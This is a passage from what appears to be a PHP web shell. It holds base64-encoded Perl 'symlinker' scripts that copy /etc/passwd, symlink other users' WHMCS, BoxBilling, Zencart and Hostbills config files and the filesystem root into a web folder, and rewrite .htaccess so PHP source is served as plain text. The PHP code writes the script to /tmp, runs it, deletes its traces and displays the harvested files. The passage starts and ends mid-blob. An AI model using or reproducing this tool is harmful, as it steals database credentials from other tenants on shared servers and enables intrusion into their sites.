RpY2tldC5waHAiLCJpZHhfc3ltLyIuJDEuIi1XSE1DUy50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL1NlY3VyZS9zdWJtaXR0aWNrZXQucGhwIiwiaWR4X3N5bS8iLiQxLiItV0hNQ1MudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9zZWN1cmUvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvU0FMRVMvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvU2FsZXMvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvc2FsZXMvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvQklMTC9zdWJtaXR0aWNrZXQucGhwIiwiaWR4X3N5bS8iLiQxLiItV0hNQ1MudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9CaWxsL3N1Ym1pdHRpY2tldC5waHAiLCJpZHhfc3ltLyIuJDEuIi1XSE1DUy50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL2JpbGwvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvUFVSQ0hBU0Uvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvUHVyY2hhc2Uvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvcHVyY2hhc2Uvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvQUNDT1VOVC9zdWJtaXR0aWNrZXQucGhwIiwiaWR4X3N5bS8iLiQxLiItV0hNQ1MudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9BY2NvdW50L3N1Ym1pdHRpY2tldC5waHAiLCJpZHhfc3ltLyIuJDEuIi1XSE1DUy50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL2FjY291bnQvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvVVNFUi9zdWJtaXR0aWNrZXQucGhwIiwiaWR4X3N5bS8iLiQxLiItV0hNQ1MudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9Vc2VyL3N1Ym1pdHRpY2tldC5waHAiLCJpZHhfc3ltLyIuJDEuIi1XSE1DUy50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL3VzZXIvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvQ0xJRU5UUy9zdWJtaXR0aWNrZXQucGhwIiwiaWR4X3N5bS8iLiQxLiItV0hNQ1MudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9DbGllbnRzL3N1Ym1pdHRpY2tldC5waHAiLCJpZHhfc3ltLyIuJDEuIi1XSE1DUy50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL2NsaWVudHMvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvQklMTElOR1Mvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvQmlsbGluZ3Mvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvYmlsbGluZ3Mvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvTVkvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvTXkvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvbXkvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvc2VjdXJlL3dobS9zdWJtaXR0aWNrZXQucGhwIiwiaWR4X3N5bS8iLiQxLiItV0hNQ1MudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9zZWN1cmUvd2htY3Mvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvcGFuZWwvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvY2xpZW50ZXMvc3VibWl0dGlja2V0LnBocCIsImlkeF9zeW0vIi4kMS4iLVdITUNTLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvY2xpZW50ZS9zdWJtaXR0aWNrZXQucGhwIiwiaWR4X3N5bS8iLiQxLiItV0hNQ1MudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9zdXBwb3J0L29yZGVyL3N1Ym1pdHRpY2tldC5waHAiLCJpZHhfc3ltLyIuJDEuIi1XSE1DUy50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL2JiLWNvbmZpZy5waHAiLCJpZHhfc3ltLyIuJDEuIi1Cb3hCaWxsaW5nLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvYm94YmlsbGluZy9iYi1jb25maWcucGhwIiwiaWR4X3N5bS8iLiQxLiItQm94QmlsbGluZy50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL2JveC9iYi1jb25maWcucGhwIiwiaWR4X3N5bS8iLiQxLiItQm94QmlsbGluZy50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL2hvc3QvYmItY29uZmlnLnBocCIsImlkeF9zeW0vIi4kMS4iLUJveEJpbGxpbmcudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9Ib3N0L2JiLWNvbmZpZy5waHAiLCJpZHhfc3ltLyIuJDEuIi1Cb3hCaWxsaW5nLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvc3VwcG9ydGVzL2JiLWNvbmZpZy5waHAiLCJpZHhfc3ltLyIuJDEuIi1Cb3hCaWxsaW5nLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvc3VwcG9ydC9iYi1jb25maWcucGhwIiwiaWR4X3N5bS8iLiQxLiItQm94QmlsbGluZy50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL2hvc3RpbmcvYmItY29uZmlnLnBocCIsImlkeF9zeW0vIi4kMS4iLUJveEJpbGxpbmcudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9jYXJ0L2JiLWNvbmZpZy5waHAiLCJpZHhfc3ltLyIuJDEuIi1Cb3hCaWxsaW5nLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvb3JkZXIvYmItY29uZmlnLnBocCIsImlkeF9zeW0vIi4kMS4iLUJveEJpbGxpbmcudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9jbGllbnQvYmItY29uZmlnLnBocCIsImlkeF9zeW0vIi4kMS4iLUJveEJpbGxpbmcudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9jbGllbnRzL2JiLWNvbmZpZy5waHAiLCJpZHhfc3ltLyIuJDEuIi1Cb3hCaWxsaW5nLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvY2xpZW50ZS9iYi1jb25maWcucGhwIiwiaWR4X3N5bS8iLiQxLiItQm94QmlsbGluZy50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL2NsaWVudGVzL2JiLWNvbmZpZy5waHAiLCJpZHhfc3ltLyIuJDEuIi1Cb3hCaWxsaW5nLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvYmlsbGluZy9iYi1jb25maWcucGhwIiwiaWR4X3N5bS8iLiQxLiItQm94QmlsbGluZy50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL2JpbGxpbmdzL2JiLWNvbmZpZy5waHAiLCJpZHhfc3ltLyIuJDEuIi1Cb3hCaWxsaW5nLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvbXkvYmItY29uZmlnLnBocCIsImlkeF9zeW0vIi4kMS4iLUJveEJpbGxpbmcudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9zZWN1cmUvYmItY29uZmlnLnBocCIsImlkeF9zeW0vIi4kMS4iLUJveEJpbGxpbmcudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9zdXBwb3J0L29yZGVyL2JiLWNvbmZpZy5waHAiLCJpZHhfc3ltLyIuJDEuIi1Cb3hCaWxsaW5nLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwIiwiaWR4X3N5bS8iLiQxLiItWmVuY2FydC50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL3plbmNhcnQvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwIiwiaWR4X3N5bS8iLiQxLiItWmVuY2FydC50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL3Byb2R1Y3RzL2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCIsImlkeF9zeW0vIi4kMS4iLVplbmNhcnQudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9jYXJ0L2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCIsImlkeF9zeW0vIi4kMS4iLVplbmNhcnQudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9zaG9wL2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCIsImlkeF9zeW0vIi4kMS4iLVplbmNhcnQudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9pbmNsdWRlcy9pc280MjE3LnBocCIsImlkeF9zeW0vIi4kMS4iLUhvc3RiaWxscy50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL2hvc3RiaWxscy9pbmNsdWRlcy9pc280MjE3LnBocCIsImlkeF9zeW0vIi4kMS4iLUhvc3RiaWxscy50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL2hvc3QvaW5jbHVkZXMvaXNvNDIxNy5waHAiLCJpZHhfc3ltLyIuJDEuIi1Ib3N0YmlsbHMudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9Ib3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwIiwiaWR4X3N5bS8iLiQxLiItSG9zdGJpbGxzLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvc3VwcG9ydGVzL2luY2x1ZGVzL2lzbzQyMTcucGhwIiwiaWR4X3N5bS8iLiQxLiItSG9zdGJpbGxzLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCIsImlkeF9zeW0vIi4kMS4iLUhvc3RiaWxscy50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL2hvc3RpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAiLCJpZHhfc3ltLyIuJDEuIi1Ib3N0YmlsbHMudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9jYXJ0L2luY2x1ZGVzL2lzbzQyMTcucGhwIiwiaWR4X3N5bS8iLiQxLiItSG9zdGJpbGxzLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvb3JkZXIvaW5jbHVkZXMvaXNvNDIxNy5waHAiLCJpZHhfc3ltLyIuJDEuIi1Ib3N0YmlsbHMudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9jbGllbnQvaW5jbHVkZXMvaXNvNDIxNy5waHAiLCJpZHhfc3ltLyIuJDEuIi1Ib3N0YmlsbHMudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9jbGllbnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwIiwiaWR4X3N5bS8iLiQxLiItSG9zdGJpbGxzLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvY2xpZW50ZS9pbmNsdWRlcy9pc280MjE3LnBocCIsImlkeF9zeW0vIi4kMS4iLUhvc3RiaWxscy50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL2NsaWVudGVzL2luY2x1ZGVzL2lzbzQyMTcucGhwIiwiaWR4X3N5bS8iLiQxLiItSG9zdGJpbGxzLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvYmlsbGluZy9pbmNsdWRlcy9pc280MjE3LnBocCIsImlkeF9zeW0vIi4kMS4iLUhvc3RiaWxscy50eHQiKTsNCgkJc3ltbGluaygiL2hvbWUvIi4kMS4iL3B1YmxpY19odG1sL2JpbGxpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwIiwiaWR4X3N5bS8iLiQxLiItSG9zdGJpbGxzLnR4dCIpOw0KCQlzeW1saW5rKCIvaG9tZS8iLiQxLiIvcHVibGljX2h0bWwvbXkvaW5jbHVkZXMvaXNvNDIxNy5waHAiLCJpZHhfc3ltLyIuJDEuIi1Ib3N0YmlsbHMudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9zZWN1cmUvaW5jbHVkZXMvaXNvNDIxNy5waHAiLCJpZHhfc3ltLyIuJDEuIi1Ib3N0YmlsbHMudHh0Iik7DQoJCXN5bWxpbmsoIi9ob21lLyIuJDEuIi9wdWJsaWNfaHRtbC9zdXBwb3J0L29yZGVyL2luY2x1ZGVzL2lzbzQyMTcucGhwIiwiaWR4X3N5bS8iLiQxLiItSG9zdGJpbGxzLnR4dCIpOw0KCQlzeW1saW5rKCIvIiwiaWR4X3N5bS9yb290Iik7DQoJCXByaW50ICQxLiItIjsNCgl9DQp9DQoNCm9wZW4oT1VULCI+aWR4X3N5bS8uaHRhY2Nlc3MiKTsNCnByaW50IE9VVCAiT3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBpbmRveHBsb2l0Lmh0bQ0KQWRkVHlwZSB0ZXh0L3BsYWluIC5waHANCkFkZEhhbmRsZXIgdGV4dC9wbGFpbiAucGhwDQpTYXRpc2Z5IEFueSI7DQpjbG9zZShPVVQpOw0KcHJpbnQgJzxjZW50ZXI+PGgxPjxhIGhyZWY9ImlkeF9zeW0iIHRhcmdldD0iX0JMQU5LIj5DbGljayBIZXJlPC9hPjwvaDE+JzsNCnVubGluaygkMCk7";\n\t\t\t\tsave("/tmp/symlink.pl", "w", base64_decode($sym[\'code\']));\n\t\t\t\texe("perl /tmp/symlink.pl");\n\t\t\t\tsleep(1);\n\t\t\t\t@unlink("/tmp/symlink.pl");\n\t\t\t\t@unlink("passwd.txt");\n\t\t\t\t@unlink("lanang_sym/pas.txt");\n\t\t\t}\n\n\t\t\tprint "<div style=\'background: #ffffff; width: 100%; height: 100%\'>";\n\t\t\tprint "<iframe src=\'http://".$_SERVER[\'HTTP_HOST\']."/".$GLOBALS[\'FILEPATH\']."/lanang_sym/\' frameborder=\'0\' scrolling=\'yes\'></iframe>";\n\t\t\tprint "</div>";\n\t\t}\n\t\telse {\n\t\t\tif($args[0] === "404") {\n\t\t\t\tif(!is_dir(path()."/lanang_sym404/")) {\n\t\t\t\t\t$sym[\'code\'] = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQojICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjIA0KIw0KIwkJTmFtZSA6IFBlcmwvQ0dJIENvbmZpZyBTeW1saW5rZXIgKFdpdGggQXV0byBCeXBhc3MgU3ltbGluayA0MDQpDQojCQlWZXJzaW9uIDogMS4yDQojCQlDcmVhdGVkIDogOSBNZWkgMjAxNw0KIwkJQXV0aG9yIDogMHgxOTk5DQojCQlUaGFua3MgVG8gOiAweElEaW90ICwgSW5kb25lc2lhbiBDb2RlIFBhcnR5ICwgSmF0aW00dQ0KIwkJTW9yZSBJbmZvIDogaHR0cDovLzB4RGFyay5ibG9nc3BvdC5jb20NCiMJCVdhbnQgdG8gcmVjb2RlID8gRG9uJ3QgZm9yZ2V0IG15IG5pY2sgbmFtZSAgOikNCiMJCWh0dHA6Ly9mYWNlYm9vay5jb20vbWVsZXguMWQNCiMJCQ0KIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyANCg0KdXNlIEZpbGU6OkNvcHk7DQp1c2Ugc3RyaWN0Ow0KdXNlIHdhcm5pbmdzOw0KdXNlIE1JTUU6OkJhc2U2NDsNCmNvcHkoIi9ldGMvcGFzc3dkIiwicGFzc3dkLnR4dCIpIDsNCm1rZGlyICJpZHhfc3ltNDA0IjsNCnN5bWxpbmsoIi8iLCJpZHhfc3ltNDA0L3Jvb3QiKTsNCm15ICRmaWxlbmFtZSA9ICdwYXNzd2QudHh0JzsNCm15ICRodGFjY2VzcyA9IGRlY29kZV9iYXNlNjQoIlQzQjBhVzl1Y3lCSmJtUmxlR1Z6SUVadmJHeHZkMU41YlV4cGJtdHpEUXBFYVhKbFkzUnZjbmxKYm1SbGVDQnBibVJ2ZUhCc2IybDBMbWgwYlEwS1FXUmtWSGx3WlNCMFpYaDBMM0JzWVdsdUlDNXdhSEFnRFFwQlpHUklZVzVrYkdWeUlIUmxlSFF2Y0d4aGFXNGdMbkJvY0EwS1UyRjBhWE5tZVNCQmJua05Da2x1WkdWNFQzQjBhVzl1Y3lBclEyaGhjbk5sZEQxVlZFWXRPQ0FyUm1GdVkzbEpibVJsZUdsdVp5QXJTV2R1YjNKbFEyRnpaU0FyUm05c1pHVnljMFpwY25OMElDdFlTRlJOVENBclNGUk5URlJoWW14bElDdFRkWEJ3Y21WemMxSjFiR1Z6SUN0VGRYQndjbVZ6YzBSbGMyTnlhWEIwYVc5dUlDdE9ZVzFsVjJsa2RHZzlLaUFOQ2tGa1pFbGpiMjRnSjJSaGRHRTZhVzFoWjJVdmNHNW5PMkpoYzJVMk5DeHBWa0pQVW5jd1MwZG5iMEZCUVVGT1UxVm9SVlZuUVVGQlFrRkJRVUZCVVVOQldVRkJRVUZtT0M4NWFFRkJRVUZDU0U1RFUxWlJTVU5CWjBsbVFXaHJhVUZCUVVGQmJIZFRSbXg2UVVGQlRqRjNRVUZFWkdOQ1VXbHBZbVZCUVVGQlFtd3dVbFpvTUZVeU9XMWtTR1JvWTIxVlFXUXpaRE5NYld4MVlUTk9hbGxZUW14TWJUbDVXalYyZFZCQ2IwRkJRVVpWVTFWU1FsWkVhVTV3V2tzNVUyZE9Ra1pKV0ZCMldFNXVaR3BqVW05d1dEUlZOR3RYVm5JMVFVTm9WVGRJT0VKVFprbDBRVWhyUWpsRFdITnlWekJIZDBWUmRGSjNWa3ROVW5SQlZUaGFZMWxYWVU1dFRUSlBlSEY1ZVdsWldtUmpSMGxoV2pSYU56ZE5aV1ZSWTNjMlJFWkJMMVZFVlVGQldVaElhamhvVDBGVWFqbHZVbE5sTWxveFpqSkxhbEF4Wm1kTWEyNU5VRk0xYkZjd1ZtazBjRnB2Y0haSVdFUlhLMGxvVDNJNU9XZFlWSHByY2pseGRsUkNUWFJ5VG1RNFFYTk1WbU52YlZwTFJGQTJNV3RGVEdsb1IwbEtPVkZDWjA4eWFtUnpTVVV2U21JMVQyRmpSMFpCZDBSUlJXVk5SVTlhYm1neFJYRk5RMmgwVTBJNFlUWTBRbGN5VFU1b04xRldhV2hEUjB0alRraHpkMjFhTUd4QmExbEllRVkwVVdoQ1VFTkxTVmxTVlRsc05qQTFTMjFIUTBWSlZWbDZkRU5aVFVKbWEwVnFSMW8wVDJsSWQxSlJSaXQyYTFGSEszQjBRVU5KUmxKRlNsWlFVVUYyUm1ZclFuSnFiM2xSSzBOYVpuRnhNVEU0UkZKR1JXaHFaV0ppWW1Wc05tUkhhWGxVY1dZcmRsTnlhMkZTVVM4d2RYUk1OMjFJV0d3NWRuRXJaVkF6Vlc1aWFDOUlOV2RFUzJsUFJqWTNXV1ZpV1RCa1UwcGpVa0p0TUhveWNrWnNNbmxYY0RoQlZrUkpWek15WkdFM2NFeEJRVUZCUVVWc1JsUnJVM1ZSYlVOREp5QmVYa1JKVWtWRFZFOVNXVjVlRFFwRVpXWmhkV3gwU1dOdmJpQW5aR0YwWVRwcGJXRm5aUzl3Ym1jN1ltRnpaVFkwTEdsV1FrOVNkekJMUjJkdlFVRkJRVTVUVldoRlZXZEJRVUZDUVVGQlFVRlJRMEZaUVVGQlFXWTRMemxvUVVGQlFVRllUbE5TTUVsQmNuTTBZelpSUVVGQlFWcHBVekJrUlVGUU9FRXZkMFF2YjB3eWJtdDNRVUZCUVd4M1UwWnNla0ZCUVV4RmQwRkJRM2hOUWtGS2NXTkhRVUZCUVVGa01GTlZNVVpDT1c5S1FtaGpWRXAyTWtJeVpEUkJRVUZLVFZOVlVrSldSR3BNWWxwUE9WUm9lRnBGU1ZjdmNXeDJaSFJOTXpoQ1RtZEtVVzFSWjBwSFpDdEJMMDFSUWt4M1IycHBkMGd6Ym5ka2ExTk1kRTh5ZUVWU1J6Vk1jWGhZVWxOSlVqSlpSR1pFTkVkclIwMHdVRE55WWpSaU9WQkJlakJzTjNCVGJGZHNWekJtYm01TWIyeEJTVkJDTkZCWWFEUmxSblZ1ZFdOQlNVbE1kMlJGVTJWYWVVRnBabTV3Tml0MU9XOU9URzh6WjAwelRucFVaRWhTS3k4dmVuWktUWHBUZVVwTFMyOWthVWxuT0VGWVlYaGxTWG94WWtSYU4wMTRjVTVtZEdkVFZWSkVWM2szVEZWdVdqQmtXVzE0UVVaQlZrVnNTVFpCUlVONVowbHpVVkZ6YVhwTVFrOUJRa0ZFVDJwTFFYQnhhRGQxTjBkdlExVlhhWGRaWW1WMGIxVkljbkpRWTNkRGNXOUdNa3RWWlZoTWVrVjZRbll3SzNWUmJWTklUVVZhT1VZMlUxcGpjalpwTkVselFrOWhMMkkzU0ZGTllVaDBTVUYzWjB4a1NHRnNSRUV4WlhZd1pWRmlVMnB5UlhKUmQwcHdjVVkwWlVGNEwyaHZjVVF4TXpKdFRXdEtjbWsxZFZOUGJFWm9SV2h3VlZGSmFXOXFkMkZ0VDBST2MyeHFabFZYUTNGd1RHNVBZV0ZEVTB0S2RHNWhRa056V2xscVFXeHNiVmhKTkhaaFpXOWhWbGd3WTJKVFpHaHRWVkl6ZWtGTGRrNXFXVFpXYVc5dk1IUlhlbWRGYjI1TFlsY3JTMnRIVjNRelZXNTBNRU5sUjJaS2N6bG5LMVZWTUhKRlIwaElMMGgzTDAxcVNEWXZWQ3RRVDJSR2IxSk9TME5vVFRJeWVHMVBVR1Z6Y0dwUVIxRTJTSEJPVVRJM2REWnpRVU5FVTA1aGJubHZiR3BFVEVWa1ZtRkdUMHhsT0ZwclZXcExOWFZyY1ROME56bHNVRU0zTDA5RWF6VkhZU3RaTms4MVRYRjViVTUzTTFZeGVUTm9lWHBtV0RCb2NYWktUSGxpV0Vaa0t5dG1NbVF6WkRCa2JYTXJjWFpuTkU5RWVqaG1TSGd3TDB4elltVXpPVFkwYzFNM0t6UjFSV3AxYm5CeGJWTmxObVV6UkROT05TOU9NRmRhWW5Sc2VUbG1NRGx1V2pKYUwySXlPWFl5Wmt4RlpYWjJTemx4ZGpkak1uUnZTMms0VldscFVXbHhTR0p0Tm5KcFZ6WmhNVE5tYml0NmRqY3pLMjl4YjNKb1kweG5TMVZHV0ZaUUsyWnVOVElyVEc5dWFqaEpURW93VURoYVNVTkRSamt2VUZSd1EyeG9jRUoyWjFCbGJHOU1PVlUxTlU1SlFVRkJRVUZCVTFWV1QxSkxOVU5aU1VrOUp3MEtTVzVrWlhoSloyNXZjbVVnS2k1MGVIUTBNRFFOQ2tsdVpHVjRVM1I1YkdWVGFHVmxkQ0FuYUhSMGNEb3ZMMlYyWlc1MExtbHVaRzk0Y0d4dmFYUXViM0l1YVdRdmMzbHRiR2x1YXk1amMzTW5EUXBTWlhkeWFYUmxSVzVuYVc1bElFOXVEUXBTWlhkeWFYUmxRMjl1WkNBbGUxSkZVVlZGVTFSZlJrbE1SVTVCVFVWOUlGNHVLakI0YzNsdE5EQTBJRnRPUTEwTkNsSmxkM0pwZEdWU2RXeGxJRnd1ZEhoMEpDQWxlMUpGVVZWRlUxUmZWVkpKZlRRd05DQmJUQ3hTUFRNd01pNU9RMTA9Iik7DQpteSAkc3ltID0gZGVjb2RlX2Jhc2U2NCgiVDNCMGFXOXVjeUJKYm1SbGVHVnpJRVp2Ykd4dmQxTjViVXhwYm10ekRRcEVhWEpsWTNSdmNubEpibVJsZUNCcGJtUnZlSEJzYjJsMExtaDBiUTBLU0dWaFpHVnlUbUZ0WlNBd2VERTVPVGt1ZEhoMERRcFRZWFJwYzJaNUlFRnVlUTBLU1c1a1pYaFBjSFJwYjI1eklFbG5ibTl5WlVOaGMyVWdSbUZ1WTNsSmJtUmxlR2x1WnlCR2IyeGtaWEp6Um1seWMzUWdUbUZ0WlZkcFpIUm9QU29nUkdWelkzSnBjSFJwYjI1WGFXUjBhRDBxSUZOMWNIQnlaWE56U0ZSTlRGQnlaV0Z0WW14bERRcEpibVJsZUVsbmJtOXlaU0FxRFFwSmJtUmxlRk4wZVd4bFUyaGxaWFFnSjJoMGRIQTZMeTlsZG1WdWRDNXBibVJ2ZUhCc2IybDBMbTl5TG1sa0wzTjViV3hwYm1zdVkzTnpKdz09Iik7DQpvcGVuKG